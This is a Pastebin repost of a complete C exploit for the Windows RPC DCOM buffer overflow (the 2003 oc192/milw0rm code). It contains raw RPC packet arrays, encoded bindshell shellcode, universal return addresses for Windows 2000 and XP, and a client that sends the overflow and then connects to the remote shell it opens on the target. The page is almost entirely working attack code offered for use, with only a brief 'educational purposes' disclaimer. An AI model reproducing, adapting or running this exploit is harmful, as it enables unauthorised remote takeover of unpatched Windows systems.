API tools faq
paste
Advertisement
FlyFar

Microsoft Windows - 'RPC DCOM' Remote (Universal) - CVE-2003-0605

FlyFar
Jan 30th, 2024
1,635
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 16.90 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /* Windows remote RPC DCOM exploit
  2.  * Coded by oc192
  3.  *
  4.  * Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
  5.  * ExitThread in its shellcode to prevent the RPC service from crashing upon
  6.  * successful exploitation. It also has several other options including definable
  7.  * bindshell and attack ports.
  8.  *
  9.  * Features:
  10.  *
  11.  * -d destination host to attack.
  12.  *
  13.  * -p for port selection as exploit works on ports other than 135(139,445,539 etc)
  14.  *
  15.  * -r for using a custom return address.
  16.  *
  17.  * -t to select target type (Offset) , this includes universal offsets for -
  18.  *    win2k and winXP (Regardless of service pack)
  19.  *
  20.  * -l to select bindshell port on remote machine (Default: 666)
  21.  *
  22.  * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
  23.  *   preventing crash of RPC service on remote machine.
  24.  *
  25.  *   This is provided as proof-of-concept code only for educational
  26.  *   purposes and testing by authorized individuals with permission to
  27.  *   do so.
  28.  */
  29.  
  30. #include <stdio.h>
  31. #include <stdlib.h>
  32. #include <sys/types.h>
  33. #include <sys/socket.h>
  34. #include <netinet/in.h>
  35. #include <arpa/inet.h>
  36. #include <unistd.h>
  37. #include <netdb.h>
  38. #include <fcntl.h>
  39. #include <unistd.h>
  40.  
  41. /* xfocus start */
  42. unsigned char bindstr[]={
  43. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  44. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  45. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  46. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  47. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  48.  
  49. unsigned char request1[]={
  50. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  51. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  52. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  53. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  54. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  55. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  56. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  57. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  58. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  59. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  60. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  61. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  62. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  63. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  65. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  66. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  67. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  73. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  74. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  75. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  76. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  77. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  78. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  79. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  80. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  82. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  83. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  84. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  85. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  86. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  87. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  88. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  89. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  90. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  91. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  92. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  93. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  94. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  95. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  96. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  97. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  98. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  99. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  100. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  101. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  102. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  103. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  104. ,0x00,0x00,0x00,0x00,0x00,0x00};
  105.  
  106. unsigned char request2[]={
  107. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  108. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  109.  
  110. unsigned char request3[]={
  111. 0x5C,0x00
  112. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  113. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  114. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  115. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  116. /* end xfocus */
  117.  
  118. int type=0;
  119. struct
  120. {
  121.   char *os;
  122.   u_long ret;
  123. }
  124.  targets[] =
  125.  {
  126.   { "[Win2k-Universal]", 0x0018759F },
  127.   { "[WinXP-Universal]", 0x0100139d },
  128. }, v;
  129.  
  130.  
  131. void usage(char *prog)
  132. {
  133.   int i;
  134.   printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
  135.   printf("Usage:\n\n");
  136.   printf("%s -d <host> [options]\n", prog);
  137.   printf("Options:\n");
  138.   printf("  -d:     Hostname to attack [Required]\n");
  139.   printf("  -t:     Type [Default: 0]\n");
  140.   printf("  -r:     Return address [Default: Selected from target]\n");
  141.   printf("  -p:     Attack port [Default: 135]\n");
  142.   printf("  -l:     Bindshell port [Default: 666]\n\n");
  143.   printf("Types:\n");
  144.   for(i = 0; i < sizeof(targets)/sizeof(v); i++)
  145.     printf("    %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
  146.   exit(0);
  147. }
  148.  
  149. unsigned char sc[]=
  150.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  151.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  152.     "\x46\x00\x58\x00\x46\x00\x58\x00"
  153.  
  154.     "\xff\xff\xff\xff" /* return address */
  155.    
  156.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  157.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  158.  
  159.     /* bindshell no RPC crash, defineable spawn port */
  160.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  161.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  162.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  163.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  164.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  165.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  166.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  167.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  168.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  169.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  170.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  171.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  172.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  173.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  174.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  175.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  176.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  177.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
  178.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  179.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  180.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  181.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  182.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  183.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  184.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  185.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  186.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  187.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  188.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  189.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  190.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  191.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  192.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  193.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  194.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  195.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  196.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  197.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  198.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  199.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  200.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  201.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  202.  
  203. /* xfocus start */
  204. unsigned char request4[]={
  205. 0x01,0x10
  206. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  207. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  208. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  209. };
  210. /* end xfocus */
  211.  
  212. /* Not ripped from teso =) */
  213. void con(int sockfd)
  214. {
  215.   char rb[1500];
  216.   fd_set  fdreadme;
  217.   int i;
  218.  
  219.   FD_ZERO(&fdreadme);
  220.   FD_SET(sockfd, &fdreadme);
  221.   FD_SET(0, &fdreadme);
  222.  
  223.   while(1)
  224.   {
  225.     FD_SET(sockfd, &fdreadme);
  226.     FD_SET(0, &fdreadme);
  227.       if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
  228.         if(FD_ISSET(sockfd, &fdreadme))
  229.         {
  230.           if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
  231.           {
  232.             printf("[-] Connection lost..\n");
  233.             exit(1);
  234.           }
  235.             if(write(1, rb, i) < 0) break;
  236.         }
  237.  
  238.         if(FD_ISSET(0, &fdreadme))
  239.         {
  240.           if((i = read(0, rb, sizeof(rb))) < 0)
  241.           {
  242.             printf("[-] Connection lost..\n");
  243.             exit(1);
  244.           }
  245.            if (send(sockfd, rb, i, 0) < 0) break;
  246.         }
  247.            usleep(10000);
  248.         }
  249.        
  250.         printf("[-] Connection closed by foreign host..\n");
  251.  
  252.         exit(0);
  253. }
  254.  
  255. int main(int argc, char **argv)
  256. {
  257.     int len, len1, sockfd, c, a;
  258.     unsigned long ret;
  259.     unsigned short port = 135;
  260.     unsigned char buf1[0x1000];
  261.     unsigned char buf2[0x1000];
  262.     unsigned short lportl=666; /* drg */
  263.     char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
  264.     struct hostent *he;
  265.     struct sockaddr_in their_addr;
  266.     static char *hostname=NULL;
  267.  
  268.     if(argc<2)
  269.     {
  270.       usage(argv[0]);
  271.     }
  272.  
  273.     while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
  274.     {
  275.       switch (c)
  276.       {
  277.         case 'd':
  278.           hostname = optarg;
  279.           break;
  280.         case 't':
  281.           type = atoi(optarg);
  282.           if((type > 1) || (type < 0))
  283.           {
  284.             printf("[-] Select a valid target:\n");
  285.               for(a = 0; a < sizeof(targets)/sizeof(v); a++)
  286.               printf("    %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);              
  287.               return 1;
  288.           }
  289.           break;
  290.         case 'r':
  291.           targets[type].ret = strtoul(optarg, NULL, 16);
  292.           break;
  293.         case 'p':
  294.           port = atoi(optarg);
  295.           if((port > 65535) || (port < 1))
  296.           {
  297.             printf("[-] Select a port between 1-65535\n");
  298.             return 1;
  299.           }
  300.           break;
  301.         case 'l':
  302.           lportl = atoi(optarg);  
  303.           if((port > 65535) || (port < 1))
  304.           {
  305.             printf("[-] Select a port between 1-65535\n");
  306.             return 1;
  307.           }
  308.           break;
  309.        default:
  310.           usage(argv[0]);
  311.           return 1;
  312.       }
  313.     }
  314.  
  315.     if(hostname==NULL)
  316.     {
  317.       printf("[-] Please enter a hostname with -d\n");
  318.       exit(1);
  319.     }
  320.  
  321.     printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
  322.     printf("[+] Resolving host..\n");
  323.  
  324.     if((he = gethostbyname(hostname)) == NULL)
  325.     {
  326.       printf("[-] gethostbyname: Couldnt resolve hostname\n");
  327.       exit(1);
  328.     }
  329.  
  330.     printf("[+] Done.\n");
  331.  
  332.     printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
  333.               targets[type].os, hostname, port, lportl, targets[type].ret);
  334.  
  335.     /* drg */  
  336.     lportl=htons(lportl);
  337.     memcpy(&lport[1], &lportl, 2);
  338.     *(long*)lport = *(long*)lport ^ 0x9432BF80;
  339.     memcpy(&sc[471],&lport,4);
  340.  
  341.     memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
  342.  
  343.     their_addr.sin_family = AF_INET;
  344.     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  345.     their_addr.sin_port = htons(port);
  346.  
  347.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  348.     {
  349.         perror("[-] Socket failed");
  350.         return(0);
  351.     }
  352.    
  353.     if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  354.     {
  355.         perror("[-] Connect failed");
  356.         return(0);
  357.     }
  358.    
  359.     /* xfocus start */
  360.     len=sizeof(sc);
  361.     memcpy(buf2,request1,sizeof(request1));
  362.     len1=sizeof(request1);
  363.    
  364.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
  365.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
  366.    
  367.     memcpy(buf2+len1,request2,sizeof(request2));
  368.     len1=len1+sizeof(request2);
  369.     memcpy(buf2+len1,sc,sizeof(sc));
  370.     len1=len1+sizeof(sc);
  371.     memcpy(buf2+len1,request3,sizeof(request3));
  372.     len1=len1+sizeof(request3);
  373.     memcpy(buf2+len1,request4,sizeof(request4));
  374.     len1=len1+sizeof(request4);
  375.    
  376.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
  377.    
  378.  
  379.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
  380.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  381.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  382.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  383.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  384.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  385.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  386.     /* end xfocus */
  387.    
  388.  
  389.     if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
  390.     {
  391.             perror("[-] Send failed");
  392.             return(0);
  393.     }
  394.     len=recv(sockfd, buf1, 1000, 0);
  395.    
  396.     if (send(sockfd,buf2,len1,0)== -1)
  397.     {
  398.             perror("[-] Send failed");
  399.             return(0);
  400.     }
  401.     close(sockfd);
  402.     sleep(1);
  403.    
  404.     their_addr.sin_family = AF_INET;
  405.     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  406.     their_addr.sin_port = lportl;
  407.  
  408.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  409.     {
  410.         perror("[-] Socket failed");
  411.         return(0);
  412.     }
  413.    
  414.     if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  415.     {
  416.         printf("[-] Couldnt connect to bindshell, possible reasons:\n");
  417.         printf("    1:  Host is firewalled\n");
  418.         printf("    2:  Exploit failed\n");
  419.         return(0);
  420.     }  
  421.    
  422.     printf("[+] Connected to bindshell..\n\n");
  423.  
  424.     sleep(2);
  425.  
  426.     printf("-- bling bling --\n\n");
  427.  
  428.     con(sockfd);
  429.  
  430.     return(0);
  431. }
  432.  
  433. // milw0rm.com [2003-08-07]
Tags: Exploit CVE Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!